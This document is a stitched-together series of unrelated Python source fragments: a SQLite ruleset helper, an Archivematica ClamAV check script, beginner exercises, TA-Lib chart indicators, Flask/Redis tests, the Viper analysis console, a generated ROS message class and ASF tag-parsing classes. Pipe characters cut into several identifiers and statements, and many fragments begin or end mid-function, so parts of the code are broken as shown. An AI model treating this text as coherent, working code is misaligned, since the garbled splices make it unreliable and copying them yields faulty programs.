cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
if cur.fetchone() :
exist = True
# 存在的话,结果是什么
cur.execute("SELECT rules FROM Domains,Rulesets "
"WHERE domain=? AND Domains.did=Rulesets.did"
,(domain,) )
ruleset = cur.fetchone()
return (exist, ruleset)
def rollback(self):
self.conn.rollback()
def showAll(self):
self.conn.commit()
cur = self.conn.cursor()
cur.execute("SELECT * FROM Domains")
print cur.fetchall()
cur.execute("SELECT * FROM Websites")
print cur.fetchall()
_dbcli = None
def getCliInstance():
global _dbcli
if not _dbcli:
_dbcli = DatabaseHelper()
return _dbcli
def test():
dbcli = getCliInstance()
# dbcli.insertDomain('jaysonhwang.com')
# dbcli.insertRuleset('test','jaysonhwang.com')
print dbcli.robotsrulesetOfDomain('www.zol.com')
print dbcli.robotsrulesetOfDomain('jayson.com')
dbcli.showAll()
dbcli.close()
if __name__ == '__main__':
test()
|
#!/usr/bin/python -OO
# This file is part of Archivematica.
#
# Copyright 2010-2012 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
# @version svn: $Id$
#source /etc/archivematica/archivematicaConfig.conf
import os
import sys
sys.path.append("/usr/lib/archivematica/archivematicaCommon")
from executeOrRunSubProcess import executeOrRun
from databaseFunctions import insertIntoEvents
from archivematicaFunctions import escapeForCommand
clamscanResultShouldBe="Infected files: 0"
if __name__ == '__main__':
fileUUID = sys.argv[1]
target = sys.argv[2]
date = sys.argv[3]
taskUUID = sys.argv[4]
command = 'clamdscan - <" | ' + escapeForCommand(target) + '"'
print >>sys.stderr, command
commandVersion = "clamdscan -V"
eventOutcome = "Pass"
clamscanOutput = executeOrRun("bashScript", command, printing=False)
clamscanVersionOutput = executeOrRun("command", commandVersion, printing=False)
if clamscanOutput[0] | or clamscanVersionOutput[0]:
if clamscanVersionOutput[0]:
print >>sys.stderr, clamscanVersionOutput
exit(2)
else:
eventOutcome = "Fail"
if eventOutcome == "Fail" or clamscanOutput[1].find(clamscanResultShouldBe) == -1:
eventOutcome = "Fail"
print >>sys.stderr, fileUUID, " - ", os.path.basename(target)
print >>sys.stderr, clamscanOutput
version, virusDefs, virusDefsDate = clamscanVersionOutput[1].split("/")
virusDefs = virusDefs + "/" + virusDefsDate
eventDetailText = "program=\"Clam AV\"; version=\"" + version + "\"; virusDefinitions=\"" + virusDefs + "\""
if fileUUID != "None":
insertIntoEvents(fileUUID=fileUUID, eventIdentifierUUID=taskUUID, eventType="virus check", eventDateTime=date, eventDetail=eventDetailText, eventOutcome=eventOutcome, eventOutcomeDetailNote="")
if eventOutcome != "Pass":
exit(3)
|
outfile=open("helloworld.txt","w")
for num1 in range(1,10):
for num2 in range(1,10):
if num2<=num1 :
outfile.write("{}*{}={} ".format(num2, num1 ,num1 * num2))
outfile.write(" \n")
outfile.flush()
outfile.close()
infile=open("helloworld.txt","r")
for line in infile.readlines():
print line
infile.close()
import sys
sys.stdout.write("foo\n")
sys.stderr.write("foo2 \n")
def test_var_kwargs(farg, **kwargs):
print "formal arg:", farg
for key in kwargs:
print "arg: {}:{}".format(key, kwargs[key])
test_var_kwargs(2,a="sd",b="ds")
def return_stuff(var):
| return [1, 2,{'a':1, 'b':2},'string']
a=return_stuff(1)
print a
x=222
def t1():
global x
x=111
t1()
print x
import os
for ld in os.listdir("c:/Miko"):
print ld
print os.listdir("c:/Miko")
class Person(object):
def __init__(self, first_name, last_name):
self.first_name = first_name
self.last_name = last_name
def | get_first_name(self):
return self.first_name
def set_first_name(self, new_name):
self.first_name = new_name
p = Person("John", "Smith")
#p.set_first_name("FooJohn")
print p.get_first_name()
print dir(p)[-4:]
class Single(object):
def __i |
#!/usr/bin/env python
"""
PURPOSE: The routines in this file test the get_neighborhoods module.
Created on 2015-04-02T21:24:17
"""
from __future__ import division, print_function
#import numpy as np
#from types import *
#from nose.tools import raises
#import pandas as pd
import nhrc2.backend.read_seeclickfix_api_to_csv as rscf
from nhrc2.backend import get_neighborhoods as get_ngbrhd
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "matthew.giguere@yale.edu"
__status__ = " Development NOT(Prototype or Production)"
#make sure the number of neighborhoods is equal to the number of issues.
def test_get_ | neighborhoods():
"""
Ensure the number in the hood list length = the number of issues
"""
scf_cats = rscf.read_categories(readfile=True)
issues = rscf.read_issues(scf_cats, readfile=True)
hoods = get_ngbrhd.get_neighborhoods()
assert len(issues) == len(hoods)
#@raises(ValueError)
#def test_make_function_raise_value | _error():
|
AMA(self.df[self.cl].values,
timeperiod)
def add_TRIMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Triangular Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'TRIMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.TRIMA(self.df[self.cl].values,
timeperiod)
def add_MAMA(self, fastlimit=0.5, slowlimit=0.05,
types=['line', 'line'], colors=['secondary', 'tertiary'],
**kwargs):
"""MESA Adaptive Moving Average.
Note that the first argument of types and colors refers to MAMA while the
second argument refers to FAMA.
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
colors = [kwargs['color']] * 2
mama = 'MAMA({},{})'.format(str(fastlimit), str(slowlimit))
fama = 'FAMA({},{})'.format(str(fastlimit), str(slowlimit))
self.pri[mama] = dict(type=types[0], color=colors[0])
self.pri[fama] = dict(type=types[1], color=colors[1])
self.ind[mama], self.ind[fama] = talib.MAMA(self.df[self.cl].values,
fastlimit, slowlimit)
def add_MAVP(self, periods, minperiod=2, maxperiod=30, matype=0,
type='line', color='secondary', **kwargs):
"""Moving Average with Variable Period.
Parameters
----------
periods : Series or array
Moving Average period over timeframe to analyze, as a 1-dimensional
shape of same length as chart.
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
if isinstance(periods, pd.Series):
periods = periods.values
elif isinstance(periods, np.ndarray):
pass
else:
raise TypeError("Invalid periods {0}. "
"It should be Series or array."
.format(periods))
name = 'MAVP({},{})'.format(str(minperiod), str(maxperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MAVP(self.df[self.cl].values,
periods, minperiod, maxperiod, matype)
def add_BBANDS(self, timeperiod=20, nbdevup=2, nbdevdn=2, matype=0,
types=['line_dashed_thin', 'line_dashed_thin'],
colors=['tertiary', 'grey_strong'], **kwargs):
"""Bollinger Bands.
Note that the first argument of types and colors refers to upper and lower
bands while second argument refers to middle band. (Upper and lower are
symmetrical arguments, hence only 2 needed.)
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
colors = [kwargs['color']] * 2
name = 'BBANDS({},{},{})'.format(str(timeperiod),
str(nbdevup),
str(nbdevdn))
ubb = name + '[Upper]'
bb = name
lbb = name + '[Lower]'
self.pri[ubb] = dict(type='line_' + types[0][5:],
color=colors[0])
self.pri[bb] = dict(type='area_' + types[1][5:],
color=colors[1], fillcolor='fill')
self.pri[lbb] = dict(type='area_' + types[0][5:],
color=colors[0], fillcolor='fill')
(self.ind[ubb],
self.ind[bb],
self.ind[lbb]) = talib.BBANDS(self.df[self.cl].values,
timeperiod, nbdevup, nbdevdn, matype)
def add_HT_TRENDLINE(self,
type='line', color='secondary', **kwargs):
"""Hilert Transform Instantaneous Trendline."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'HT_TRENDLINE'
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.HT_TRENDLINE(self.df[self.cl].values)
def add_MIDPOINT(self, timeperiod=14,
type='line', color='secondary', **kwargs):
"""Midpoint Price over Period."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'MIDPOINT({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MIDPOINT(self.df[self.cl].values)
def add_SAR(self, acceleration=0.02, maximum=0.20,
type='scatter', color='tertiary', **kwargs):
"""Parabolic SAR."""
if not (self.has_high and self.has_low):
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'SAR({},{})'.format(str(acceleration), str(maximum))
self.pri[name] = dict(type=type, color=c | olor)
self.ind[name] = talib.SAR(self.df[self. | hi].values,
self.df[self.lo].values,
acceleration, maximum)
def add_SAREXT(self, startvalue=0, offsetonreverse=0,
accelerationinitlong=0.02, accelerationlong=0.02,
accelerationmaxlong=0.20, accelerationinitshort=0.02,
accelerationshort=0.02, accelerationmaxshort=0.20,
type='scatter', color='tertiary', **kwargs):
"""Parabolic SAR Extended."""
if not (self.has_high and self.has_low):
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = ('SAREXT({},{},{},{},'
'{},{},{},{})'.format(str(startvalue), str(offsetonreverse),
str(accelerationinitlong),
str(accelerationlong),
str(accelerationmaxlong),
str(accelerationinitshort),
str(accelerationshort),
str(accelerationmaxshort)))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.SAREXT(self.df[self.hi].values,
self.df[self.lo].values,
startvalue, offsetonreverse,
accelerationinitlong,
accelerationlong,
accelerationmaxlong,
accelerationinitshort,
accelerationshort,
accelerationmaxshort)
self.ind[name] = self.ind[name].abs() # Bug right now with negative value
# Momentum indicators
def add_APO(self, fastperiod=12, slowperiod=26, matype=0,
type='line', color='secondary', **kwargs):
"""Absolute Price Oscillator."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'APO({}, {})'.format(str(fastperiod), str(slowperiod))
self.sec[name] = dict(type=type, color=color)
self.ind[name] = talib.APO(self.df[self.cl].values,
fastperiod, slowperiod, matype)
def add_AROON(self, timeperiod=14,
types=['line', 'line'],
colors=['increasing', 'decreasing'],
**kwargs):
"""Aroon indicators.
Note that the first argument of types and colors refers to Aroon up while
the second argument refers to Aroon down.
"""
if n |
import json
import uuid
import unittest
from main import app
from app import redis
class FlaskTestCase(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
self.site_host = str(uuid.uuid4())
def tearDown(self):
pass # self.delete_site()
def make_site(self):
self.app.post('/site/new', data=dict(
site=self.site_host,
style="",
text="test",
x=0,
y=0
))
def delete_site(self):
self.app.delete('/site/delete/{}'.format(self.site_host))
def get_site_data(self):
response = self.app.get('/site/get/{}'.format(self.site_host))
site_data = json.loads(response.data.dec | ode())
return site_data
def test_create_and_destroy_site(self):
def get_site_keys():
return set(redis.keys(self.si | te_host + '*'))
self.assertSetEqual(get_site_keys(), set())
self.make_site()
self.assertSetEqual(get_site_keys(), {
self.site_host,
self.site_host + "_1",
self.site_host + "_magnet_index",
})
self.assertSetEqual(set(redis.sscan_iter(self.site_host)), {"1"})
self.delete_site()
self.assertSetEqual(get_site_keys(), set())
def test_add_magnet(self):
self.make_site()
self.assertDictEqual(self.get_site_data(), {
'mags': [
dict(
style="",
text="test",
x=0,
y=0
)
],
'ok': True
})
def test_remove_magnet(self):
self.make_site()
self.app.delete('/mag/delete', data={
'site': self.site_host,
'mag_id': 1
})
self.assertDictEqual(self.get_site_data(), {
'mags': [],
'ok': True
})
def test_move_magnet(self):
self.make_site()
self.app.put(
'/mag/move',
data=dict(site=self.site_host, mag_id=1, x=10, y=10)
)
self.assertDictEqual(self.get_site_data(), {
'mags': [
{'style': '', 'text': 'test', 'x': 10, 'y': 10}
],
'ok': True
})
if __name__ == '__main__':
unittest.main()
|
print_output
from viper.common.colors import cyan, magenta, white, bold, blue
from viper.core.session import __sessions__
from viper.core.plugins import __modules__
from viper.core.project import __project__
from viper.core.ui.commands import Commands
from viper.core.database import Database
from viper.core.config import Config, console_output
cfg = Config()
# For python2 & 3 compat, a bit dirty, but it seems to be the least bad one
try:
input = raw_input
except NameError:
pass
def logo():
print(""" _
(_)
_ _ _ ____ _____ ____
| | | | | _ \| ___ |/ ___)
\ V /| | |_| | ____| |
\_/ |_| __/|_____)_| v1.3-dev
|_|
""")
db = Database()
count = db.get_sample_count()
try:
db.find('all')
except:
print_error("You need to update your Viper database. Run 'python update.py -d'")
sys.exit()
if __project__.name:
name = __project__.name
else:
name = 'default'
print(magenta("You have " + bold(count)) +
magenta(" files in your " + bold(name)) +
magenta(" repository"))
class Console(object):
def __init__(self):
# This will keep the main loop active as long as it's set to True.
self.active = True
self.cmd = Commands()
def parse(self, data):
root = ''
args = []
# Split words by white space.
words = data.split()
# First word is the root command.
root = words[0]
# If there are more words, populate the arguments list.
if len(words) > 1:
args = words[1:]
return (root, args)
def keywords(self, data):
# Check if $self is in the user input data.
if '$self' in data:
# Check if there is an open session.
if __sessions__.is_set():
# If a session is opened, replace $self with the path to
# the file which is currently being analyzed.
data = data.replace('$self', __sessions__.current.file.path)
else:
print("No open session")
return None
return data
def stop(self):
# Stop main loop.
self.active = False
def start(self):
# Logo.
logo()
# Setup shell auto-complete.
def complete(text, state):
# Try to autocomplete commands.
cmds = [i for i in self.cmd.commands if i.startswith(text)]
if state < len(cmds):
return cmds[state]
# Try to autocomplete modules.
mods = [i for i in __modules__ if i.startswith(text)]
if state < len(mods):
return mods[state]
# Then autocomplete paths.
if text.startswith("~"):
text = "{0}{1}".format(expanduser("~"), text[1:])
return (glob.glob(text+'*')+[None])[state]
# Auto-complete on tabs.
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind('tab: complete')
readline.set_completer(complete)
# Save commands in history file.
def save_history(path):
readline.write_history_file(path)
# If there is an history file, read from it and load the history
# so that they can be loaded in the shell.
# Now we are storing the history file in the local project folder
history_path = os.path.join(__project__.path, 'history')
if os.path.exists(history_path):
readline.read_history_file(history_path)
# Register the save history at program's exit.
atexit.register(save_history, path=history_path)
# Main loop.
while self.active:
# If there is an open session, we include the path to the opened
# file in the shell prompt.
# TODO: perhaps this block should be moved into the session so that
# the generation of the prompt is done only when the session's
# status changes.
prefix = ''
if __project__.name:
prefix = bold(cyan(__project__.name)) + ' '
if __sessions__.is_set():
stored = ''
filename = ''
if __sessions__.current.file:
filename = __sessions__.current.file.name
if not Database().find(key='sha256', value=__sessions__.current.file.sha256):
stored = magenta(' [not stored]', True)
misp = ''
if __sessions__.current.misp_event:
misp = '[MISP'
if __sessions__.current.misp_event.event.id:
misp += ' {}'.format(__sessions__.current.misp_event.event.id)
else:
misp += ' New Event'
if __sessions__.current.misp_event.off:
misp += ' (Offline)'
misp += ']'
prompt = (prefix + cyan('viper ', True) +
white(filename, True) + blue(misp, True) + stored + cyan(' > ', True))
# Otherwise display the basic prompt.
| else:
prompt = prefix + cyan('viper > ', True)
# Wait for input from the user.
try:
data = input(prompt).strip()
except KeyboardInterrupt:
print("")
# Terminate on EOF.
except EOFError:
self.stop()
print("")
continue
# Parse the input if the user provided any.
else:
# If there are recogni | zed keywords, we replace them with
# their respective value.
data = self.keywords(data)
# Skip if the input is empty.
if not data:
continue
# Check for output redirection
# If there is a > in the string, we assume the user wants to output to file.
if '>' in data:
data, console_output['filename'] = data.split('>')
print("Writing output to {0}".format(console_output['filename'].strip()))
# If the input starts with an exclamation mark, we treat the
# input as a bash command and execute it.
# At this point the keywords should be replaced.
if data.startswith('!'):
os.system(data[1:])
continue
# Try to split commands by ; so that you can sequence multiple
# commands at once.
# For example:
# viper > find name *.pdf; open --last 1; pdf id
# This will automatically search for all PDF files, open the first entry
# and run the pdf module against it.
split_commands = data.split(';')
for split_command in split_commands:
split_command = split_command.strip()
if not split_command:
continue
# If it's an internal command, we parse the input and split it
# between root command and arguments.
root, args = self.parse(split_command)
# Check if the command instructs to terminate.
if root in ('exit', 'quit'):
self.stop()
continue
try:
# If the root command is part of the embedded commands list we
# execute it.
if root in self.cmd.commands:
self.cmd.commands[root]['obj'](*args)
del(self.cmd.output[:])
# If the root command is part of loaded modules, we initialize
# the module and execute it.
elif root in __modules__:
module = __modules__[root]['obj']()
module.set_command |
"""autogenerated by genpy from rosserial_msgs/TopicInfo.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class TopicInfo(genpy.Message):
_md5sum = "0ad51f88fc44892f8c10684077646005"
_type = "rosserial_msgs/TopicInfo"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# special topic_ids
uint16 ID_PUBLISHER=0
uint16 ID_SUBSCRIBER=1
uint16 ID_SERVICE_SERVER=2
uint16 ID_SERVICE_CLIENT=4
uint16 ID_PARAMETER_REQUEST=6
uint16 ID_LOG=7
uint16 ID_TIME=10
uint16 ID_TX_STOP=11
# The endpoint ID for this topic
uint16 topic_id
string topic_name
string message_type
# MD5 checksum for this message type
string md5sum
# size of the buffer message must fit in
int32 buffer_size
"""
# Pseudo-constants
ID_PUBLISHER = 0
ID_SUBSCRIBER = 1
ID_SERVICE_SERVER = 2
ID_SERVICE_CLIENT = 4
ID_PARAMETER_REQUEST = 6
ID_LOG = 7
ID_TIME = 10
ID_TX_STOP = 11
__slots__ = ['topic_id','topic_name','message_type','md5sum','buffer_size']
_slot_types = ['uint16','string','string','string','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
topic_id,topic_name,message_type,md5sum,buffer_size
:param args: complete set of field values, in .msg order
:param kwds: use keyword a | rguments corresponding to | message field names
to set specific fields.
"""
if args or kwds:
super(TopicInfo, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.topic_id is None:
self.topic_id = 0
if self.topic_name is None:
self.topic_name = ''
if self.message_type is None:
self.message_type = ''
if self.md5sum is None:
self.md5sum = ''
if self.buffer_size is None:
self.buffer_size = 0
else:
self.topic_id = 0
self.topic_name = ''
self.message_type = ''
self.md5sum = ''
self.buffer_size = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_struct_H.pack(self.topic_id))
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.message_type
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.md5sum
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_i.pack(self.buffer_size))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 2
(self.topic_id,) = _struct_H.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message_type = str[start:end].decode('utf-8')
else:
self.message_type = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.md5sum = str[start:end].decode('utf-8')
else:
self.md5sum = str[start:end]
start = end
end += 4
(self.buffer_size,) = _struct_i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_struct_H.pack(self.topic_id))
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.message_type
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.md5sum
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_i.pack(self.buffer_size))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 2
(self.topic_id,) = _struct_H.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message_type = str[start:end].decode('utf-8')
else:
self.message_type = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.md5sum = str[start:end].decode('utf-8')
else:
self.md5sum = str[start:end]
start = end
end += 4
(self.buffer_size,) = _struct_i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_i = struct.Struct("<i")
_struct_H = struct.Struct("<H")
|
int):
value = ASFQWordAttribute(value)
self.append((key, value))
def keys(self):
"""Return all keys in the comment."""
return self and set(next(iter(zip(*self))))
def as_dict(self):
"""Return a copy of the comment data in a real dict."""
d = {}
for key, value in self:
d.setdefault(key, []).append(value)
return d
@total_ordering
class ASFBaseAttribute(object):
"""Generic attribute."""
TYPE = None
def __init__(self, value=None, data=None, language=None,
stream=None, **kwargs):
self.language = language
self.stream = stream
if data:
self.value = self.parse(data, **kwargs)
else:
self.value = value
def data_size(self):
raise NotImplementedError
def __repr__(self):
name = "%s(%r" % (type(self).__name__, self.value)
if self.language:
name += ", language=%d" % self.language
if self.stream:
name += ", stream=%d" % self.stream
name += ")"
return name
def render(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
data = self._render()
return (struct_pack("<H", len(name)) + name +
struct_pack("<HH", self.TYPE, len(data)) + data)
def render_m(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
if self.TYPE == 2:
data = self._render(dword=False)
else:
data = self._render()
return (struct_pack("<HHHHI", 0, self.stream or 0, len(name),
self.TYPE, len(data)) + name + data)
def render_ml(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
if self.TYPE == 2:
data = self._render(dword=False)
else:
data = self._render()
return (struct_pack("<HHHHI", self.language or 0, self.stream or 0,
len(name), self.TYPE, len(data)) + name + data)
def __lt__(self, other):
return self.value < other
def __eq__(self, other):
return self.value == other
class ASFUnicodeAttribute(ASFBaseAttribute):
"""Unicode string attribute."""
TYPE = 0x0000
def parse(self, data):
return data.decode("utf-16-le").strip("\x00")
def _render(self):
return self.value.encode("utf-16-le") + b"\x00\x00"
def data_size(self):
return len(self.value) * 2 + 2
def __str__(self):
return self.value
__hash__ = ASFBaseAttribute.__hash__
class ASFByteArrayAttribute(ASFBaseAttribute):
"""Byte array attribute."""
TYPE = 0x0001
def parse(self, data):
return data
def _render(self):
return self.value
def data_size(self):
return len(self.value)
def __str__(self):
return "[binary data (%s bytes)]" % len(self.value)
def __lt__(self, other):
return str(self) < other
def __eq__(self, other):
return str(self) == other
__hash__ = ASFBaseAttribute.__hash__
class ASFBoolAttribute(ASFBaseAttribute):
"""Bool attribute."""
TYPE = 0x0002
def parse(self, data, dword=True):
if dword:
return struct_unpack("<I", data)[0] == 1
else:
return struct_unpack("<H", data)[0] == 1
def _render(self, dword=True):
if dword:
return struct_pack("<I", int(self.value))
else:
return struct_pack("<H", int(self.value))
def data_size(self):
return 4
def __bool__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFDWordAttribute(ASFBaseAttribute):
"""DWORD attribute."""
TYPE = 0x0003
def parse(self, data):
return struct_unpack("<L", data)[0]
def _render(self):
return struct_pack("<L", self.value)
def data_size(self):
return 4
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFQWordAttribute(ASFBaseAttribute):
"""QWORD attribute."""
TYPE = 0x0004
def parse(self, data):
return struct_unpack("<Q", data)[0]
def _render(self):
return struct_pack("<Q", self.value)
def data_size(self):
return 8
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFWordAttribute(ASFBaseAttribute):
"""WORD attribute."""
TYPE = 0x0005
def parse(self, data):
return struct_unpack("<H", data)[0]
def _render(self):
return struct_pack("<H", self.value)
def data_size(self):
return 2
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFGUIDAttribute(ASFBaseAttribute):
"""GUID attribute."""
TYPE = 0x0006
def parse(self, data):
return data
def _render(self):
return self.value
def data_size(self):
return len(self.value)
def __str__(self):
return self.value
__hash__ = ASFBaseAttribute.__hash__
UNICODE = ASFUnicodeAttribute.TYPE
BYTEARRAY = ASFByteArrayAttribute.TYPE
BOOL = ASFBoolAttribute.TYPE
DWORD = ASFDWordAttribute.TYPE
QWORD = ASFQWordAttribute.TYPE
WORD = ASFWordAttribute.TYPE
GUID = ASFGUIDAttribute.TYPE
def ASFValue(value, kind, **kwargs):
for t, c in list(_attribute_types.items()):
if kind == t:
return c(value=value, **kwargs)
raise ValueError("Unknown value type")
_attribute_types = {
ASFUnicodeAttribute.TYPE: ASFUnicodeAttribute,
ASFByteArrayAttribute.TYPE: ASFByteArrayAttribute,
ASFBoolAttribute.TYPE: ASFBoolAttribute,
ASFDWordAttribute.TYPE: ASFDWordAttribute,
ASFQWordAttribute.TYPE: ASFQWordAttribute,
ASFWordAttribute.TYPE: ASFWordAttribute,
ASFGUIDAttribute.TYPE: ASFGUIDAttribute,
}
_standard_attribute_names = [
"Title",
"Author",
"Copyright",
"Description",
"Rating"
]
class BaseObject(object):
"""Base ASF object."""
GUID = None
def parse(self, asf, data, fileobj, size):
self.data = data
def render(self, asf):
data = self.GUID + struct_pack("<Q", len(self.data) + 24) + self.data
return data
class UnknownObject(BaseObject):
"""Unknown ASF object."""
def __init__(self, guid):
self.GUID = guid
class HeaderObject(object):
"""ASF header."""
GUID = b"\x30\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C"
class ContentDescriptionObject(BaseObject):
"""Content description."""
GUID = b"\x33\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C"
def parse(self, asf, data, fileobj, size):
super(ContentDescriptionObject, self).parse(asf, data, fileobj, size)
asf.content_description_obj = self
lengths = struct_unpack("<HHHHH", data[:10])
texts = []
pos = 10
for length in lengths:
end = pos + length
if length > 0:
texts.append(data[pos:end].decode("utf-16-le"). | strip("\x00"))
else:
texts.append(None)
pos = end
title, author, copyright, desc, rating = texts
for key, value in li | st(dict(
Title=title,
Author=author,
Copyright=copyright,
Description=desc,
Rating=rating).items()):
if value is not None:
asf.tags[key] = value
def render(self, asf):
def render_text(name):
value = asf.tags.get(name, [])
if value:
return value[0].encode("utf-16-le") + b"\x00\x00"
else:
return b""
texts = list(map(render_text, _standard_attribute_names))
data = struct_pack("<HHHHH", *map(len, texts)) + b"".join(texts)
return self.GUID + struct_pack("<Q", 24 + len(data)) + data
class Exten |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
[tests/stdlib/test_help.py]
Test the help command.
"""
import unittest
#import os
#f | rom ergonomica import ergo, ENV
class TestHelp(unittest.TestCase):
"""Tests the 'help' command."""
def test_list_commands(self):
"""
Tests listing all commands using the 'help commands' command.
"""
| |
from som.interp_type import is_ast_interpreter
